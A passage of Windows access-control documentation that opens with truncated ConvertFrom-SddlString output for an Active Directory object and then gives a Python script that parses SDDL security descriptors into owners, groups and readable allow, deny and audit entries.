AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
(CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
WriteExtendedAttributes)...}
SystemAcl : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse),
BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
(Traverse)...}
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
```
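`ConvertFrom-SddlString` only exists on Windows; the Python below is an added example, not code from the page, that parses the same SDDL grammar (owner, group, ACL flags and `type;flags;rights;object_guid;inherit_guid;sid` ACEs) so an exported descriptor can be read anywhere. Rights letters are rendered with their directory-service names, so the page's first ACE `(D;;DC;;;WD)` reads `DeleteChild` here; the cmdlet printed `WriteData` for the same bit because it decoded the mask with the file-system vocabulary. `SAMPLE_SDDL` is constructed from the first ACEs of the page's string plus a made-up audit ACE, and the parser flags a descriptor cut mid-ACE, as the page's copied string is.

```python
"""Parse an SDDL string into owner, group and readable ACEs (added example; the
sample descriptor is constructed from the first ACEs of the page's string)."""
import re

SID_ALIASES = {  # common two-letter SDDL aliases; anything else is kept verbatim
    "BA": "BUILTIN\\Administrators", "BU": "BUILTIN\\Users", "WD": "Everyone",
    "AN": "NT AUTHORITY\\ANONYMOUS LOGON", "AU": "NT AUTHORITY\\Authenticated Users",
    "SY": "NT AUTHORITY\\SYSTEM", "ED": "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
    "DA": "Domain Admins", "DD": "Domain Controllers", "DU": "Domain Users",
    "EA": "Enterprise Admins", "CO": "CREATOR OWNER", "PS": "Principal Self"}
ACE_TYPES = {"A": "Allow", "D": "Deny", "OA": "ObjectAllow", "OD": "ObjectDeny",
             "AU": "Audit", "OU": "ObjectAudit", "AL": "Alarm"}
ACE_FLAGS = {"CI": "ContainerInherit", "OI": "ObjectInherit", "NP": "NoPropagateInherit",
             "IO": "InheritOnly", "ID": "Inherited", "SA": "SuccessfulAccess", "FA": "FailedAccess"}
ACL_FLAGS = {"P": "Protected", "AR": "AutoInheritRequired", "AI": "AutoInherited"}
RIGHTS = {"GA": "GenericAll", "GR": "GenericRead", "GW": "GenericWrite", "GX": "GenericExecute",
          "RC": "ReadControl", "SD": "Delete", "WD": "WriteDac", "WO": "WriteOwner",
          "CC": "CreateChild", "DC": "DeleteChild", "LC": "ListChildren", "SW": "SelfWrite",
          "RP": "ReadProperty", "WP": "WriteProperty", "DT": "DeleteTree", "LO": "ListObject",
          "CR": "ControlAccess"}  # directory-service names for the rights letters
_SECTION = re.compile(r"([OGDS]):")  # O:owner G:group D:dacl S:sacl
_ACE = re.compile(r"\(([^()]*)\)")   # only complete (...) groups are ACEs


def _pairs(s: str, table: dict):
    """Expand a run of two-letter codes ('CIIO' -> ContainerInherit, InheritOnly)."""
    return [table.get(s[i:i + 2], s[i:i + 2]) for i in range(0, len(s), 2)]


def _acl_flags(s: str):
    out, i = [], 0
    while i < len(s):  # 'P' is the only one-letter ACL flag
        step = 1 if s[i] == "P" else 2
        out.append(ACL_FLAGS.get(s[i:i + step], s[i:i + step]))
        i += step
    return out


def parse_ace(text: str) -> dict:
    """ace_type;flags;rights;object_guid;inherit_object_guid;sid (extra fields ignored)."""
    parts = text.split(";")
    if len(parts) < 6:
        raise ValueError(f"ACE needs 6 fields: ({text})")
    ace_type, flags, rights, obj_guid, inh_guid, sid = parts[:6]
    return {"type": ACE_TYPES.get(ace_type, ace_type),
            "flags": _pairs(flags, ACE_FLAGS),
            "rights": [rights] if rights.lower().startswith("0x") else _pairs(rights, RIGHTS),
            "object_type": obj_guid or None,
            "inherited_object_type": inh_guid or None,
            "trustee": SID_ALIASES.get(sid, sid)}


def parse_sddl(sddl: str) -> dict:
    """Split the O:/G:/D:/S: sections; 'truncated' is True when an ACE list is cut
    mid-ACE (unbalanced parentheses), as the string copied on the page is."""
    sddl = sddl.strip()
    out = {"owner": None, "group": None, "dacl_flags": [], "dacl": [],
           "sacl_flags": [], "sacl": [], "truncated": sddl.count("(") != sddl.count(")")}
    marks = list(_SECTION.finditer(sddl))
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(sddl)
        body = sddl[m.end():end]
        if m.group(1) == "O":
            out["owner"] = SID_ALIASES.get(body, body)
        elif m.group(1) == "G":
            out["group"] = SID_ALIASES.get(body, body)
        else:
            name = "dacl" if m.group(1) == "D" else "sacl"
            paren = body.find("(")
            out[name + "_flags"] = _acl_flags(body if paren < 0 else body[:paren])
            out[name] = [parse_ace(a) for a in _ACE.findall(body)]
    return out


def format_ace(ace: dict) -> str:
    """'Everyone: Deny (DeleteChild)' style line, like the cmdlet's DiscretionaryAcl output."""
    scope = f" on {ace['object_type']}" if ace["object_type"] else ""
    return f"{ace['trustee']}: {ace['type']} ({', '.join(ace['rights'])}){scope}"


# Constructed: first three ACEs of the page's descriptor plus a made-up audit ACE.
SAMPLE_SDDL = ("O:BAG:BAD:AI(D;;DC;;;WD)"
               "(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;"
               "S-1-5-21-3842939050-3880317879-2865463114-5189)"
               "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)"
               "S:(AU;SA;WPWO;;;WD)")

if __name__ == "__main__":
    desc = parse_sddl(SAMPLE_SDDL)
    print("Owner:", desc["owner"], "| DACL flags:", desc["dacl_flags"])
    for ace in desc["dacl"]:
        print(" ", format_ace(ace))
```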